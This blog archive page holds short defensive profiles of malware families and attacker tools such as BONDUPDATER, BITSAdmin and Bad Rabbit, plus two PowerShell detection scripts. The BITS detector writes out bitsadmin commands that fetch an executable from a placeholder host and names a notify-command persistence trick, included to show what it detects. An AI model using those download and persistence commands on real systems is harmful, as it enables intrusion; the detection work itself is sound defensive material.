Posts

Showing posts from October, 2022

Track Common Adversary Tasks Performed Using BONDUPDATER

To know more about it, you can go through my detailed document by clicking here.

Overview
BONDUPDATER is a PowerShell backdoor used by OilRig. It was first detected in November 2017 and an updated version appeared in August 2018. It has been used in repeated phishing-driven campaigns against government and corporate organizations in the Middle East.

How Does It Work?
The trojan provides basic backdoor functionality that lets the threat actors upload and download files, execute commands, terminate running processes, and add or delete files. It communicates with its C&C server over DNS tunneling, so the command traffic rides inside ordinary name lookups and bypasses controls that only inspect HTTP.

Mitigation
The following methods might help in mitigating the threat: maintain web server patching and log audits, and run web services with the minimum operating system permissions. Regularly update the security services of all the apps and operating systems present in your system. You should a
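The DNS-tunneling channel described above leaves a recognisable pattern in resolver logs: one registrable domain receiving many distinct, long, high-entropy subdomains, often as TXT queries. The following PowerShell script is an added example, not code from the original post or from any vendor; it scores constructed query-log lines for those traits. The log line layout, the domains, the client addresses and the thresholds are assumptions for this illustration and must be adapted to your resolver's real log format.

```powershell
# Added example (not from the original post). It scores DNS query names for the
# traces a DNS-tunnelling backdoor leaves: many distinct, long, high-entropy
# subdomains under a single registrable domain, frequently as TXT queries.
# The log line format, the domains, the client addresses and the thresholds
# are all constructed for this illustration; adapt the regex to the layout of
# your own resolver's query log.

function Get-ShannonEntropy {
    # Bits of entropy per character of $Text (hex chunks score near 4, words near 2-3).
    param([string]$Text)
    if ([string]::IsNullOrEmpty($Text)) { return 0.0 }
    $counts = @{}
    foreach ($ch in $Text.ToCharArray()) { $counts[$ch] = 1 + [int]$counts[$ch] }
    $h = 0.0
    foreach ($n in $counts.Values) {
        $p = $n / $Text.Length
        $h -= $p * [math]::Log($p, 2)
    }
    return [math]::Round($h, 2)
}

function Find-DnsTunnelCandidate {
    param(
        [string[]]$LogLines,
        [int]$MinUniqueSubdomains = 5,    # distinct leftmost labels per base domain
        [int]$MinAvgLabelLength   = 20,   # encoded data chunks are long
        [double]$MinAvgEntropy    = 3.0   # ordinary hostnames usually score below this
    )
    $pattern = '^(?<ts>\S+ \S+) client (?<client>\S+) query (?<type>\w+) (?<name>\S+)$'
    $groups = @{}
    foreach ($line in $LogLines) {
        if ($line -notmatch $pattern) { continue }
        $labels = $Matches['name'].TrimEnd('.').Split('.')
        if ($labels.Count -lt 3) { continue }           # nothing below the registrable domain
        # Assumption: registrable domain = last two labels (no public-suffix list used here).
        $base  = $labels[-2..-1] -join '.'
        $first = $labels[0]
        if (-not $groups.ContainsKey($base)) {
            $groups[$base] = @{ Labels = @{}; Types = @(); Clients = @{} }
        }
        $groups[$base].Labels[$first] = $true
        $groups[$base].Types += $Matches['type']
        $groups[$base].Clients[$Matches['client']] = $true
    }
    foreach ($base in $groups.Keys) {
        $g      = $groups[$base]
        $uniq   = @($g.Labels.Keys)
        $avgLen = ($uniq | ForEach-Object { $_.Length } | Measure-Object -Average).Average
        $avgEnt = ($uniq | ForEach-Object { Get-ShannonEntropy $_ } | Measure-Object -Average).Average
        $txtShare = @($g.Types | Where-Object { $_ -eq 'TXT' }).Count / $g.Types.Count
        $suspect = ($uniq.Count -ge $MinUniqueSubdomains) -and ($avgLen -ge $MinAvgLabelLength) -and ($avgEnt -ge $MinAvgEntropy)
        [pscustomobject]@{
            BaseDomain       = $base
            UniqueSubdomains = $uniq.Count
            AvgLabelLength   = [math]::Round($avgLen, 1)
            AvgLabelEntropy  = [math]::Round($avgEnt, 2)
            TxtQueryShare    = [math]::Round($txtShare, 2)
            Clients          = (@($g.Clients.Keys) -join ',')
            Suspect          = $suspect
        }
    }
}

# Constructed sample: one host issuing encoded lookups plus normal browsing noise.
$sampleLog = @(
    '2022-10-03 10:15:01 client 10.0.0.5 query TXT 4a7d1ed414474e4033ac29ccb8653d9b.c2.example.invalid'
    '2022-10-03 10:15:03 client 10.0.0.5 query TXT 9f86d081884c7d659a2feaa0c55ad015.c2.example.invalid'
    '2022-10-03 10:15:05 client 10.0.0.5 query A e3b0c44298fc1c149afbf4c8996fb924.c2.example.invalid'
    '2022-10-03 10:15:07 client 10.0.0.5 query TXT 5d41402abc4b2a76b9719d911017c592.c2.example.invalid'
    '2022-10-03 10:15:09 client 10.0.0.5 query TXT 098f6bcd4621d373cade4e832627b4f6.c2.example.invalid'
    '2022-10-03 10:15:11 client 10.0.0.5 query A d41d8cd98f00b204e9800998ecf8427e.c2.example.invalid'
    '2022-10-03 10:15:02 client 10.0.0.7 query A www.microsoft.com'
    '2022-10-03 10:15:04 client 10.0.0.7 query A login.microsoftonline.com'
    '2022-10-03 10:15:06 client 10.0.0.9 query A mail.google.com'
    '2022-10-03 10:15:08 client 10.0.0.9 query AAAA cdn.example.org'
)

Find-DnsTunnelCandidate -LogLines $sampleLog |
    Sort-Object Suspect -Descending |
    Format-Table -AutoSize
```

On the constructed sample only example.invalid is flagged: six distinct 32-character hex labels, average entropy above 3.5 bits and a majority of TXT queries, while the browsing noise stays well under every threshold. In production the thresholds need tuning against your own baseline, because CDNs, anti-spam lookups and some EDR agents legitimately generate long, random-looking labels under a single domain.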

Track Common Adversary Tasks Performed Using Bonadan

To know more about it, you can go through my detailed document by clicking here.

Overview
Bonadan is a backdoored build of OpenSSH that also acts as a custom backdoor. It was detected in 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.

How Does It Work?
The module starts as a new thread that calls two functions every five minutes. The first checks for and removes any other cryptocurrency miner installed on the system; the second connects to the C&C server and sends the following information about the host: the username of the account running the backdoor, the OS version, the external IP address of the infected host, the CPU model, the RAM size, the speed of the running miner, etc.

Defense
You can use the following methods to defend against the malware: use long and complex passwords; enable key-based authentication.

Track Common Adversary Tasks Performed Using BLUELIGHT

To know more about it, you can go through my detailed document by clicking here.

Overview
BLUELIGHT is a Remote Access Trojan (RAT) used by APT37, most recently in 2021. APT37 is a North Korean state-sponsored threat group that primarily targets South Korean public and private sector organizations and has also targeted Japan, Vietnam, and the Middle East. Its victims span industries such as chemicals, electronics, manufacturing, aerospace, and healthcare.

Cyber Attacks
The group has hit various South Korean sectors with the ROKRAT trojan and has targeted journalists with the multi-platform Chinotto malware, among other operations against organizations in the countries it attacks.

Other Malware Tools Used by APT37
APT37 (also tracked under the alias ScarCruft) maintains a wide range of malicious tools, including NavRAT, CORALDECK, Karae, DOGCALL, ROKRAT, SOUNDWAVE, ZUMKONG, and MILKDROP, capable of doing significant damage to any system or organization.

Vulnerabilities Exploited
Exploits vulne

Track Common Adversary Tasks Performed Using BLINDINGCAN

To know more about it, you can go through my detailed document by clicking here.

Overview
BLINDINGCAN is a Remote Access Trojan used by the North Korean government in 2020 cyber operations against organizations in Western Europe and the USA, including defense and engineering firms, to steal confidential intelligence and sensitive information.

How Does It Work?
It generally spreads via phishing emails in which the threat actors pose as recruiters from a legitimate organization and lure the victims into opening a malicious document (an Office or PDF file) that infects their system. Once they gain access, they collect information related to the military and energy sectors. Although this technique is not novel, it can still evade antivirus detection. The malware can perform the following tasks: gather local IP address details; collect information about all the disks installed on the system; create, start, and terminate a process; get processor inform

Track Common Adversary Tasks Performed Using BlackMould

To know more about it, you can go through my detailed document by clicking here.

Overview
BlackMould is a China Chopper-based web shell used on servers running Microsoft IIS. GALLIUM has used it since 2019 in intrusions against telecommunication providers.

How Does It Work?
After infiltrating a network, the attackers steal credentials with common tools and TTPs (Tactics, Techniques, and Procedures) and use them to move laterally between hosts and execute processes on other systems. GALLIUM generally uses web shells to gain persistence in the target's network and to drop its second-stage malware payloads.

Mitigation
The following methods might help in mitigating the threat: maintain web server patching and log audits, and run web services with the minimum operating system permissions. Regularly update the security services of all the apps and op

Track Common Adversary Tasks Performed Using BLACKCOFFEE

To know more about it, you can go through my detailed document by clicking here.

Overview
BLACKCOFFEE is malware used by several Chinese cyber threat groups to target U.S. law firms, mining companies, IT companies, and other non-government organizations.

How Does It Work?
After infiltrating a system, the malware can perform the following tasks: exfiltrate data; add new information; create a reverse shell; create a log; terminate running processes. The malware obtains its C&C addresses in encoded form and, after decoding them, delivers the stolen data to the operators on the instructions of the C&C servers.

Prevention
The following measures can help in mitigating these kinds of threats: users should be well-trained and aware of the potential threats and how to handle them. Be wary of emails from untrusted sources. Don't open links or attachments from untrusted sources. Regularly update your systems, software, and applications. Always use

Track Common Adversary Tasks Performed Using BITSAdmin

To know more about it, you can go through my detailed document by clicking here.

Overview
BITSAdmin (Background Intelligent Transfer Service Admin) is a command-line tool that creates and manages BITS jobs. It is generally used to download files from, or upload files to, HTTP web servers and SMB file shares. It handles network interruptions, pausing and automatically resuming transfers, even across a reboot.

How Does It Work?
Two of BITSAdmin's switches, /transfer and /addfile, serve a similar purpose but are used differently: /transfer creates a job, adds a file to it and runs it in a single command, whereas /addfile attaches a file to a job that must already exist and that is then resumed and completed with separate switches. Because BITSAdmin moves files as jobs, the job must be defined before anything is transferred, which is what those other switches do.

Detection
Regularly monitoring logs for use of the BITSAdmin tool and recovering transfer details from the QMGR database are some of the ways to detect it. However, it was very difficult to detect BITS transf
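The following PowerShell script is an added example, not code from the original post or from Microsoft, covering both halves of the passage above: it documents the job-based bitsadmin sequence (/create, /addfile, /resume, /complete, and the /transfer one-liner that collapses them) and then implements the log-based detection, reading event 59 from the Microsoft-Windows-Bits-Client/Operational log and listing still-queued jobs with Get-BitsTransfer. It assumes Windows 10 or 11 with that operational log at its default setting and the built-in BitsTransfer module; the job name, the download URL and the host allowlist are placeholders chosen for the illustration.

```powershell
# Added example (not from the original post or from Microsoft's own tooling).
# Assumes Windows 10/11 with the default Microsoft-Windows-Bits-Client/Operational
# log and the built-in BitsTransfer module; the allowlist, the job name and the
# URL are placeholders chosen for this illustration.

# 1. The bitsadmin sequence behind a download. A job exists before any file is
#    attached, nothing is fetched until the job is resumed, and /complete is what
#    finally releases the file to disk. The strings only document the steps;
#    this script does not execute them.
$BitsAdminSteps = @(
    'bitsadmin /create /download stagingjob'
    'bitsadmin /addfile stagingjob https://files.example.invalid/tool.exe C:\Users\Public\tool.exe'
    'bitsadmin /resume stagingjob'
    'bitsadmin /complete stagingjob'
)
# /transfer collapses the same four steps into one command and produces the
# same BITS-Client events, so detection should not key on the switch name.
$BitsAdminOneLiner = 'bitsadmin /transfer stagingjob /download /priority normal ' +
                     'https://files.example.invalid/tool.exe C:\Users\Public\tool.exe'
# An adversary after persistence rather than a download can attach a program
# to run when the job finishes: bitsadmin /SetNotifyCmdLine stagingjob <exe> NULL.
# bitsadmin /GetNotifyCmdLine stagingjob shows whether one is set.

# 2. Event 59 in the BITS-Client operational log is written when a job starts
#    transferring and includes the remote URL; 3 and 4 mark job creation and
#    completion and 60 marks a stopped transfer. Flag transfers whose host is
#    not one we expect BITS to talk to.
function Get-SuspiciousBitsTransfer {
    param(
        [string[]]$AllowedHosts = @('download.windowsupdate.com', 'update.microsoft.com'),
        [int]$Hours = 24
    )
    $filter = @{
        LogName   = 'Microsoft-Windows-Bits-Client/Operational'
        Id        = 59
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        # Pull the URL from the rendered message rather than from EventData field
        # names, which have changed between Windows builds.
        if ($e.Message -notmatch 'https?://[^\s"]+') { continue }
        $url     = $Matches[0].TrimEnd('.')
        $urlHost = ([uri]$url).Host
        if ($AllowedHosts -contains $urlHost) { continue }
        [pscustomobject]@{
            Time    = $e.TimeCreated
            Host    = $urlHost
            Url     = $url
            UserSid = $e.UserId
        }
    }
}

# 3. Jobs that are still queued or suspended. A job staged now and resumed
#    later (or after a reboot) has not yet produced event 59, so also inspect
#    live jobs. -AllUsers requires an elevated prompt.
function Get-LiveBitsJob {
    Import-Module BitsTransfer -ErrorAction Stop
    Get-BitsTransfer -AllUsers | ForEach-Object {
        [pscustomobject]@{
            Name   = $_.DisplayName
            State  = $_.JobState
            Owner  = $_.OwnerAccount
            Remote = (@($_.FileList | ForEach-Object { $_.RemoteName }) -join ';')
            Local  = (@($_.FileList | ForEach-Object { $_.LocalName }) -join ';')
        }
    }
}

Get-SuspiciousBitsTransfer | Format-Table -AutoSize
Get-LiveBitsJob | Format-Table -AutoSize
```

For the forensic angle the passage mentions, job state survives on disk independently of the event log: on Windows 10 and later it lives in %ALLUSERSPROFILE%\Microsoft\Network\Downloader\qmgr.db (an ESE database), and on older releases in qmgr0.dat and qmgr1.dat in the same folder, so those files are worth collecting from a host where the operational log has been cleared.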

Track Common Adversary Tasks Performed Using BitPaymer

To know more about it, you can go through my detailed document by clicking here.

Overview
BitPaymer is ransomware that uses a unique encryption key, ransom note and contact information for each operation; it targeted hospitals in the UK in 2017. Because it is often delivered via Dridex, it is considered connected with the Dridex malware.

How Does It Work?
Like other ransomware, it arrives through various attack vectors, in particular targeted phishing campaigns against vulnerable organizations. The phishing email urges the victim to click on a link or document that downloads the malware payload. BitPaymer operators also gain access to a network by brute-forcing RDP (Remote Desktop Protocol) credentials.

Prevention
The following factors might help in mitigating the ransomware: regularly conduct a thorough review of all RDP connections and all public-facing servers. Only use RDP when it is necessary, and that t

Track Common Adversary Tasks Performed Using Bisonal

To know more about it, you can go through my detailed document by clicking here.

Overview
The Bisonal RAT has been used by the Tonto Team since 2010 to target public and private sector organizations in Russia, South Korea, and Japan. Over the past few years it has evolved and adopted various techniques to avoid detection while keeping the core of the RAT the same.

How Does It Work?
It generally spreads via enticing phishing emails that lure the victims into opening the attached files or links, which gives the attackers a strong foothold within the victim's network. They generally attack specific targets, which indicates that they are mainly interested in operational intelligence gathering and espionage.

Prevention:
Training: as humans tend to make mistakes, regular social engineering awareness training is recommended so that staff become the first line of defense against social engineering attacks. Defense in Depth: a defense-in-depth strategy can

Track Common Adversary Tasks Performed Using BISCUIT

To know more about it, you can go through my detailed document by clicking here.

Overview
BISCUIT is a backdoor used since 2007 by the Chinese cyber threat actors known as APT1, a group known for wide-scale, high-volume intrusions against organizations in English-speaking countries. Like other groups, they use spear-phishing emails to spread the malware.

Attack Methods
It generally involves the following attack methods or tools: spear-phishing; malicious attachments; vulnerable web servers; custom backdoors; Mimikatz; SQL injection; RDP, SSH, and data compression before exfiltration, etc.

Remedy
The following measures may help in preventing and mitigating this malware: regular application updates to protect against known vulnerabilities; user input validation to restrict local and remote file inclusion vulnerabilities; use of a web application firewall, r

Track Common Adversary Tasks Performed Using BendyBear

To know more about it, you can go through my detailed document by clicking here.

Overview
BendyBear is x64 shellcode used as a stage-zero implant designed to download malware from a C2 server. It was first detected in 2020 and shares some features with Waterbear.

Capabilities
Some of BendyBear's important capabilities are: it transmits payloads in modified RC4-encrypted chunks, so a single RC4 key cannot decrypt the entire payload; it is hard to detect because it checks its environment for signs of debugging and hides from analysis tools; it clears the host's DNS cache whenever it communicates with the C2 server, so the current IP address of the malicious C2 domain is resolved every time; unique session keys are generated for every C2 connection; and, using polymorphic code, it changes its runtime footprint during execution to thwart memory analysis and avoid signatu

Track Common Adversary Tasks Performed Using BBSRAT

To know more about it, you can go through my detailed document by clicking here.

Overview
BBSRAT is malware that lets attackers remotely access a compromised system and execute remote commands or code, or deploy additional malware. The threat actors behind it are known as 'Roaming Tiger', and they specifically target Russia and Russian-speaking countries via phishing emails written exclusively in Russian.

Capabilities
Once inside a system, BBSRAT can perform the following tasks: execute remote commands and send the output to the control server; delete all files related to its activity; list running processes and kill specific ones; retrieve the directory structure and a list of files; read, edit, or delete files; download more files from the control server.

Defensive Measures:
Training: as humans tend to make mistakes, regular social engineering awareness training is recommended so that the

Track Common Adversary Tasks Performed Using Bazar

To know more about it, you can go through my detailed document by clicking here.

Overview
Bazar has been in use since at least 2020 as a downloader and backdoor against professional services, healthcare, manufacturing, IT, logistics, and travel companies across the USA and Europe. It is distributed by the TrickBot operators and can deploy other malware or ransomware to steal sensitive data.

How Does It Work?
Like most backdoors, it spreads via spear-phishing emails disguised as customer complaints, payroll reports, employee termination lists, etc., containing links to Google Docs files. Once the user clicks the link, they are redirected to a page stating that the Word document, Excel spreadsheet or PDF cannot be viewed properly and that they must click another link to open it. Clicking it downloads an executable whose icon and name mimic the document, which later serves as the lo

Track Common Adversary Tasks Performed Using Bankshot

To know more about it, you can go through my detailed document by clicking here.

Overview
Bankshot, first reported by the U.S. Department of Homeland Security in December 2017, is a RAT (Remote Access Tool) used by the Lazarus group to infiltrate the Turkish financial sector.

Capabilities
The following are some of the tasks Bankshot is capable of: it can search files for specific information, inject code into running processes, and delete files, which gives it access to memory, system resources, elevated rights, etc. It can abuse the Windows command shell to move tools or other files into a compromised environment. Using obfuscated files, it can conceal the artifacts of an intrusion from forensic investigation. It can also tamper with Windows services in order to execute a malicious payload repeatedly and so establish persistence.

Track Common Adversary Tasks Performed Using Bandook

To know more about it, you can go through my detailed document by clicking here.

Overview
Bandook is a commercially available RAT used by Dark Caracal, including in the campaign termed "Operation Manul". It was first detected in 2007 and is written in Delphi and C++. It targets sensitive sectors (government, energy, financial, healthcare, education, and more) in the USA, South America, Europe, Southeast Asia, and elsewhere.

How Does It Work?
The Bandook infection chain has three stages. First, a phishing email delivers a Microsoft Word document with an embedded macro; when the document is opened, the malicious code runs. Second, a PowerShell payload encrypted inside the original Word document is decrypted and executed. Finally, that script downloads and executes the final stage of Bandook, the backdoor itself.

Prevention
The following measures can help in mitigating these kinds of threats: users should be well-trained a

Track Common Adversary Tasks Performed Using BadPatch

To know more about it, you can go through my detailed document by clicking here.

Overview
BadPatch is a Windows trojan used in a Gaza Hackers-linked campaign. It was first detected in 2017 and spreads via phishing emails carrying macro-laced attachments that deliver the malware payload. Although it attacks Windows systems, there is evidence of it being used against Android devices via a bogus app.

Capabilities
After a successful infiltration, BadPatch may allow the attackers to: collect information about the host's hardware and software; look for certain file types and file names, which are targeted for exfiltration; swap between SMTP and HTTP C&C (Command & Control) servers; take screenshots of the active window and the user's desktop; run a keylogging module that records the victim's keystrokes.

Remedy
The following measures may help in preventing and mitigating this trojan: regular application updates are necessary in order to

Track Common Adversary Tasks Performed Using BADNEWS

To know more about it, you can go through my detailed document by clicking here.

Overview
The BadNews ransomware discovered by MalwareHunterTeam is an updated version of LockCrypt. Note that it is unrelated to BADNEWS, the backdoor used by the threat actors behind the Patchwork campaign; the two only share a name. When the ransomware infects a system, it renders almost all files useless by encrypting them and demands a ransom, telling the user to buy a particular decryption tool to restore them. Paying is not recommended, as the criminals tend to ignore victims after receiving payment.

How Does It Work?
The ransomware is distributed via fake software updaters, peer-to-peer (P2P) networks, third-party software download sources, spam email campaigns, and trojans. Fake updaters compromise the system either by exploiting flaws in outdated software or by installing malware instead of the promised updates; P2P networks and the other sources make the malware appear as legitimate software a

Track Common Adversary Tasks Performed Using BADFLICK

To know more about it, you can go through my detailed document by clicking here.

Overview
BADFLICK is a backdoor used by Leviathan in spear-phishing campaigns that generally target U.S. engineering and maritime industries. It cannot survive a reboot (it has no persistence mechanism of its own), but it can open a reverse shell connection to its C2 server to download and execute other malware.

Capabilities
After launching on a host, BADFLICK can steal the following information: basic PC information such as the computer name, OS version, processor, and memory; user account credentials; network information such as the IP address, routing table, port usage, and ARP list; the list of running processes and services; folders and files within Program Files, programs in the Start menu, the list of recent files, etc. The backdoor can also receive commands from the C2 server to download and run extra modules or perform whatever task the attacker wishes.

Remedy
It is hig

Track Common Adversary Tasks Performed Using BADCALL

To know more about it, you can go through my detailed document by clicking here.

Overview
BADCALL is a trojan used by the Lazarus group that turns an infected system into a proxy server. It has been analysed in three samples, including 32-bit Windows executables that implement the proxy.

How Does It Work?
First, the malware disables the Windows Firewall, binds a specific network port, and listens for incoming connections. The attackers then connect to the compromised host using a fake Transport Layer Security (TLS) handshake together with an ASCII authentication string that authenticates their connection to BADCALL. Once authenticated, the threat actors can command the malware to relay their traffic through the compromised system as a proxy.

Prevention
The following steps can help in mitigating the malware: be careful when opening attachments or links in unsolicited emails. Regularly update the operating system, antivirus, and other security products. Use a non-administrative account for day-to-day c

Track Common Adversary Tasks Performed Using Bad Rabbit

To know more about it, you can go through my detailed document by clicking here.

Overview
Bad Rabbit is self-propagating ransomware that mainly targeted the Ukrainian transportation sector and Russian organizations and consumers. It locks victims out of their files and servers until a ransom is paid (generally in Bitcoin).

How Does It Work?
Bad Rabbit appeared in 2017 and is very similar to ransomware such as WannaCry and Petya. It spreads via drive-by downloads from malicious or compromised websites, posing as an Adobe Flash installer; when the victim runs it, their files are encrypted and a message is shown: "If you see this text, your files are no longer accessible. You might be looking for ways to recover them. Don't waste your time." A ransom in bitcoin is then demanded along with a deadline; however, paying does not always unlock the encrypted files.

Remedy

Track Common Adversary Tasks Performed Using BACKSPACE

To know more about it, you can go through my detailed document by clicking here.

Overview
BACKSPACE is a backdoor used by APT30 since 2005 against companies and organizations in many fields in countries such as India, South Korea, Malaysia, Vietnam, Thailand, Saudi Arabia, and the USA.

How Does It Work?
The malware mainly targets Microsoft Windows and spreads via spear-phishing emails containing malicious links or attachments. It can also reach systems that are disconnected from the network (air-gapped systems) and steal sensitive information from them. BACKSPACE can bypass host-based firewalls and uses a technique that transfers metadata to the attacker without attracting attention.

Prevention
The following techniques may help in defending against BACKSPACE and similar threats: identify shadow IT assets, including cloud hosts, with the help of an Attack Surface Management solution. Always keep track of the